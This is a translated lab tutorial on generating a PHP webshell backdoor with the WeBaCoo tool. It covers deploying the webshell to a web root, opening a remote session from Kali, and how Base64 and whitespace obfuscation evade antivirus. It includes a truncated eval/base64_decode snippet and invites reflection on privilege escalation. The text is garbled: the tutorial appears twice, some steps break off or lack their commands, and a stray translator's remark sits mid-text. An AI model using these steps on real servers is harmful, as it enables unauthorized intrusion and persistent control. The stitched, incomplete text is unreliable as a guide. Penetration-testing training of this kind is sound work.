Mastering WeBaCoo: A Comprehensive Guide to Creating and Analyzing PHP Backdoor Trojans

1. Introduction to the Experiment with WeBaCoo

 

1.1 WeBaCoo Experiment Overview

 

In previous experiments (Experiment 2 and Experiment 8), we covered creating a trojan program and infecting the target host. Similarly, this experiment focuses on generating trojans using WeBaCoo. The experiment starts by explaining what WeBaCoo is, its functionality, and the meaning of its parameters.

Next, it describes the characteristics of the PHP trojan files generated by WeBaCoo, followed by an analysis of the generated PHP source code. Ultimately, the PHP trojan is uploaded to a target host to complete the infection process. For the selected testing environment, users can choose either the Ubuntu host machine or the virtual machine Metasploitable2.

Note: Due to higher configuration costs, the experiment’s cloud host environment is usage-limited, allowing a maximum of 6 attempts per experiment.

1.2 Core Knowledge Points of WeBaCoo

 

This experiment focuses primarily on the theoretical and practical knowledge related to WeBaCoo. Topics include the definition, purposes, and usage of WeBaCoo. The experiment requires familiarity with the Linux operating system as all operations are conducted within it. Once a PHP trojan file is generated, permissions are required for subsequent uploads. The key takeaways of this experiment are as follows:

• Basic knowledge of Linux system operations
• Understanding PHP syntax basics
• Knowledge of WeBaCoo command-line parameters
• Step-by-step process of creating PHP trojan files with WeBaCoo
• Attacking target hosts and verifying successful exploitation

1.3 Experiment Environment Using WeBaCoo

 

Given the sensitive nature of this experiment, network access is disabled to prevent the potential misuse of security software against Shiyanlou or other sites. Additionally, the experimental environment cannot be saved. All practices must take place on authorized machines. Penetration testing differs from hacking in that it involves evaluating the security of a target system or network under explicit authorization.

The experiment environment is provided by Shiyanlou, featuring an Ubuntu 14.04 host machine equipped with two virtual machines—Kali Linux and Metasploitable2. Since WeBaCoo generates PHP trojan programs, any system capable of running PHP can theoretically serve as the target host.

For this experiment, the Ubuntu 14.04 host machine is chosen as the target host, but advanced users may opt to use Metasploitable2 instead. The demonstration uses the Ubuntu host, but curious participants can explore applying Metasploitable2 as the target.

2. Configuring the Environment for WeBaCoo

 

2.1 Setting Up the Experimental Environment for WeBaCoo

 

Throughout the creation of a PHP backdoor trojan using WeBaCoo, the primary operations occur on both Kali Linux and the Ubuntu host environment. To access the terminal in Shiyanlou’s Ubuntu environment, locate the terminal icon on the system, double-click to open it, and enter the following commands:

 # In the terminal, start the Kali virtual machine
sudo virsh start Kali

# Use the default credentials to log into the Kali virtual machine
ssh root@Kali 

Note: The command ssh root@Kali may throw errors initially. This is because after starting Kali, it takes approximately one minute for its services to fully initialize. The default password for Kali is toor. Upon successful login, you should see the following screen:

3. Understanding the Principles of WeBaCoo

 

3.1 Theoretical Background

 

1. What Is WeBaCoo?

 

WeBaCoo, short for Web Backdoor Cookie, is a compact PHP backdoor generator capable of providing a hidden script tool for remotely connecting to web servers. It embeds shell commands encoded in Base64 within the cookie headers of HTTP responses, making them difficult to detect. The Base64 encoding process and its usage in the trojan source code will be elaborated later.

2. What Does WeBaCoo Do?

 

WeBaCoo (Web Backdoor Cookie) serves as a toolkit for creating web-based backdoors. Its purpose is to establish a stealthy, terminal-like connection to a target machine. WeBaCoo generates PHP trojan scripts via the command line, which attackers can upload to vulnerable websites or induce target users to download into directories, enabling long-term control over the compromised machines.

Typically, after successfully establishing the connection, attackers proceed with privilege escalation, which depends on the vulnerabilities of the target machine. If you’re interested in learning more about breaking into host systems, consider exploring another course:

https://www.shiyanlou.com/courses/698

3. What Are WeBaCoo’s Command Parameters?

 

To view WeBaCoo’s command parameters, use the help option by entering the command webacoo -h in your terminal:

Below are the commonly used WeBaCoo command parameters:

Parameter	Description
-g	Generates the backdoor file code
-o	Specifies the output path and filename for the backdoor
-r	Obfuscates the generated backdoor code
-t	Connects to the backdoor program
-u	Specifies the backdoor URL and executes CMD commands

4. Creating a Backdoor Trojan with WeBaCoo

 

4.1 Generating PHP Trojan Files

 

After understanding the key parameters of WeBaCoo for PHP backdoor generation, proceed with creating a PHP trojan script using the following command in the terminal:

 # The -o option specifies the output file. If no path is given, the file is saved in the current directory.
webacoo -g -o hello.php

Use the ls command to view the files in the current directory and confirm whether the backdoor file has been created:

4.2 PHP Backdoor Source Code Analysis

 

As an information security professional, simply using tools is not sufficient. It’s necessary to understand the formation principles of backdoors and how the code in backdoor files operates. The backdoor file generated using the -r parameter of the WeBaCoo tool is more complex. However, for easier explanation of its core functionality, this document refrains from using the -r parameter, generating a simpler backdoor file. Next, we use the cat command to view the PHP backdoor source code:

# Run the cat command to view the source code of the backdoor
cat hello.php

The generated backdoor file contains the following code, with its core component highlighted:

Base64 encoding is a technique used to “obscure” content rather than truly secure it. It’s widely applied in MIME protocols for transferring encoded email messages. The resulting encoded content is reversible and often ends with one or two “=” characters, producing ASCII-only characters.

The strrev() function in the first line reverses a string and assigns the result to the variable $b, resulting in:

# Code after the strrev() function processes the string
$b = "base64_decode";

For the Base64-encoded string that follows, with spaces embedded between characters, we can use Python to reassemble and decode it, thereby revealing its true code. This helps deepen our understanding of the backdoor source (note: the decoding process outlined below is for learning purposes only and should not be executed in a live lab environment since the example is merely illustrative):

First, remove all the spaces within the string to get a somewhat jumbled Base64-encoded string:

# Replace spaces with

In the Ubuntu environment provided by the Lab, the nginx service is enabled by default. After uploading the backdoor file, use the following commands to stop the nginx service and start the apache2 service for testing the PHP backdoor:

# Stop the nginx service
sudo service nginx stop

# Start the apache2 service
sudo service apache2 start

Copy the backdoor file to the root directory of the website. Keep in mind that sudo privileges are required:

# Copy the backdoor file to the target machine's web directory
sudo cp /tmp/hello.php /var/www/html/

4.4 Infect the Target Machine and Establish a Session

 

After uploading the backdoor program to the target machine, use the following command in the Kali Linux terminal to establish a session channel:

# Connect to the target machine and establish a session
webacoo -t -u http://192.168.122.1/hello.php

Upon successful execution, the command prompt changes as shown below:

Note: Once successful, the terminal prompt changes from root@Kali: to webacoo$.

4.5 Viewing System Information

 

After the command prefix changes to webacoo$, you can use basic Linux commands to view the current system information and user details:

# View the current user ID
id

# View the current user
whoami

# List files in the current directory
ls

# View system information
ifconfig

5. Summary and Reflection

 

1. Experiment Overview

 

1.1 Experiment Description

 

In previous experiments 2 and 8, we introduced the process of creating backdoor programs and infecting target machines. This experiment focuses on generating backdoor programs using WeBaCoo. In the first part, we will explain what WeBaCoo is, its functionalities, and the meaning of its parameters.

Next, the experiment will explore how WeBaCoo generates PHP backdoor files and analyze the resulting PHP source code. The backdoor will then be uploaded to the target machine to facilitate infection. For this experiment, you can choose to use either the Ubuntu host machine or a Metasploitable2 virtual machine as the target system based on your preference.

Note: Due to high costs associated with configuring cloud hosts for the experiment, usage is limited to a maximum of six attempts per experiment.

1.2 Key Learning Points

 

This documentation focuses on WeBaCoo and its key functionalities, with emphasis on the following topics:

• Basic Linux system operation knowledge
• Fundamentals of PHP syntax
• Overview of WeBaCoo command-line options
• Step-by-step process for creating PHP backdoor files using WeBaCoo
• Target machine infection testing and validation

1.3 Experiment Environment Using WeBaCoo

 

Because of the sensitive nature of this experiment, internet access is disabled and the environment cannot be preserved. This practice can only be conducted on authorized systems. Penetration testing, which evaluates security measures of a network or server under proper authorization, differs significantly from malicious hacking.

The experiment environment provided by the Lab includes a host Ubuntu 14.04 system with two virtual machines: Kali Linux, a popular tool for security professionals, and Metasploitable2, commonly used as a vulnerable target machine. Although the PHP backdoor can theoretically infect any machine capable of running PHP, the host Ubuntu is used as the target here, but you can also experiment with Metasploitable2 as the target host.

2. Starting the Environment

 

2.1 Initializing the Experiment

 

For PHP backdoor development with WeBaCoo, primary operations will be performed on both Kali Linux and the Ubuntu host. Open the terminal in the Lab’s Ubuntu environment, then use the following commands:

# Start the Kali virtual machine
sudo virsh start Kali

# Log in to Kali Virtual Machine
ssh root@Kali

Note: When using ssh root@Kali, you might encounter errors if the Kali service isn’t fully initialized. Wait approximately 1 minute after starting Kali to avoid this. Default credentials for Kali are username: root and password: toor. Upon successful login, the screen will display the following:

3. Overview of the Principle

 

3.1 Explanation of the Principle

 

1. What is WeBaCoo?

 

WeBaCoo, short for “Web Backdoor Cookie,” is a compact PHP backdoor designed to provide a stealthy connection to a remote web server. It is a backdoor program script toolkit that encodes shell commands using Base64 and embeds them within the Cookie header through HTTP responses. The method used to hide commands within Base64 encoding will be covered later when breaking down the malware source code.

2. What is WeBaCoo Used For?

 

WeBaCoo, as a web backdoor scripting toolkit, is intended to establish a hidden terminal-like connection. First, WeBaCoo generates a PHP backdoor program using the necessary parameters entered through a command-line interface. Attackers typically upload this PHP backdoor to the target’s website or trick users on the target host into placing it in the server’s web directory. This connection facilitates post-exploitation persistence and control of the compromised machine.

Once the backdoor has been successfully created and uploaded to the target host, and a connection between the attacker and the victim’s host has been established, the attacker often seeks to escalate privileges. Whether privilege escalation succeeds depends on existing vulnerabilities in the victim’s host. These advanced steps are only possible after compromising the target host. Those interested in learning about host compromise techniques can explore the following training course:

https://www.shiyanlou.com/courses/698

3. What are WeBaCoo Command Parameters?

 

To understand the purpose of each WeBaCoo parameter, the following command can be entered in the terminal to display the tool’s usage options:

webacoo -h

Below is a list of commonly used parameters along with their meanings, extracted from the command-line help output:

Parameter	Description
-g	Generate the backdoor file code
-o	Specify the file’s location and name (full path)
-r	Generate obfuscated backdoor code
-t	Connect to the backdoor program
-u	Execute commands by connecting to the backdoor address

4. Steps to Create a WeBaCoo PHP Backdoor

 

4.1 Creating a PHP Backdoor Script

 

After understanding the commonly used WeBaCoo parameters, we can create a backdoor script by entering the following command in the terminal:

# "-o" specifies the output file. If no path is provided, the file is saved in the current directory.
webacoo -g -o hello.php

Verify the backdoor script generation by running the ls command in the current directory:

4.2 Analyzing PHP Backdoor Source Code

 

As an information security professional, using such tools without understanding their underlying mechanics is inadequate. Therefore, it is essential to analyze the core logic within the backdoor script. Using the -r parameter in WeBaCoo generates more complex obfuscated code. For simplicity, we avoid using it in this example to better demonstrate the backdoor’s core functionality. To reveal the source code of the generated backdoor, execute the following command:

# Use the "cat" command to inspect the source code of the generated backdoor
cat hello.php

Below is the core snippet of the backdoor’s source code:

<?php 

$b=strrev("edoced_4"."6esab");

eval($b(str_replace(" ","","a W Y ..... [truncated for simplicity]")));

?>

Base64 encoding acts as a “security through obscurity” technique, often used in MIME email transmissions. It is reversible and produces ASCII-friendly characters, sometimes ending with “=” padding.

In the script’s first line, the function strrev() reverses the string, setting the value of $b as:

# After processing by the strrev() function:
$b = "base64_decode";

The content hidden by Base64 encoding and the interspersed spaces can be reversed using Python to reveal the original PHP code hidden within the string (This demonstration is NOT meant to be executed in a live system but purely for educational purposes about WeBaCoo’s mechanisms):

First, remove the blank spaces to obtain a scrambled string encrypted with Base64:

Referencing the Base64 module for decryption reveals the attacker’s initial intent in the code. From the decoded code, it’s evident that the first step checks whether a cookie is set. Here’s a recap of the WeBaCoo tool’s mechanism, as described in the documentation. It states that shell commands are encoded in Base64 and hidden in the Cookie header:

WeBaCoo creates PHP backdoor programs that use HTTP headers to transmit command results. Shell commands are Base64-encoded and hidden within the Cookie header.

The meaning of 2>&1 in the code is:

Strictly speaking, &1 refers to file descriptor 1, which represents STDOUT_FILENO. Essentially, this is equivalent to a dup2(2) system call. The operation redirects standard output to all_result, and then duplicates the standard output to file descriptor 2 (STDERR_FILENO). As a result, both file descriptors 1 and 2 point to the same file table entry, meaning error output is merged with standard output.

4.3 Upload to the Target Machine

From the malicious source code review, we learned that WeBaCoo creates PHP backdoor files, encrypts them using Base64, and transmits commands via HTTP headers. Generally, the backdoor files are uploaded to the target machine to infect it and establish a command-and-control (C2) session. Use the following command to upload the backdoor:

Note: The username for connecting to the Experiment Server’s host is shiyanlou, and the associated password is also shiyanlou.

In the Experiment Server’s Ubuntu environment, the default service is nginx. After uploading the backdoor file, stop the nginx service and start the apache2 service to test the PHP backdoor:

Move the backdoor file to the website’s root directory. Ensure you use sudo for proper permissions:

4.4 Infect the Target Machine and Establish a Session

After uploading the backdoor program to the target machine, use the Kali Linux terminal to establish the C2 session with the following command:

Note: Upon successful connection, the command line prompt changes, as shown below:

This translation preserves the format, specialized terminology, and highly technical phrasing in clear, precise American English while adhering to the original structure and maintaining its references to cybersecurity concepts.

When the command-line prefix changes from root@Kali: to webacoo$, you can start using basic Linux commands to obtain system and user information after gaining access:

4.5 Inspect System Information

After the prefix in the terminal changes to webacoo$, you can proceed to retrieve information such as current details and user information using basic Linux commands:

# Check the current user ID
id

# Confirm the current username
whoami

# List files in the current directory
ls

# Display system information
ifconfig

5. Summary and Reflections

5.1 Summary and Reflections

This experiment introduced the specific use of the web backdoor toolkit WeBaCoo (short for Web Backdoor Cookie). The process covered creating a PHP backdoor script using WeBaCoo and performing source code analysis of the generated backdoor script hello.php. From the analysis, we learned that WeBaCoo communicates command results by utilizing HTTP response headers. Shell commands are Base64 encoded and embedded within the Cookie header for added obfuscation.

The methodology for creating a PHP backdoor involves reversing Base64-encoded characters using the strrev() function and then embedding spaces within the generated code to bypass antivirus programs and improve the backdoor’s persistence.

6. Homework

6.1 Homework

The WeBaCoo toolkit also includes a corresponding module for the MSF (Metasploit Framework) terminal in Kali Linux. This module is written in Ruby. For those interested in the underlying mechanics and with knowledge of Ruby, you can explore the source code of the WeBaCoo MSF module:

https://github.com/anestisb/WeBaCoo/blob/master/msf_webacoo_module.rb

After completing this experiment, you should understand how PHP backdoor scripts are crafted with Base64 encoding and injected with whitespace for obfuscation to evade detection. Reflect on the following questions:

• Are there alternative encryption algorithms beyond Base64 that could be used?
• Is it necessary for the backdoor to be implemented in PHP? Could the same principles be applied to backdoors written in other programming languages?
• Once a session is established, how can privilege escalation on the server be performed?

This concludes the training program. Thank you for participating in the course. Remember, practicing and engaging hands-on is key to mastering these concepts. For questions or unclear topics in the course, feel free to ask in the discussion forums—our instructors and lab assistants will do their best to help you.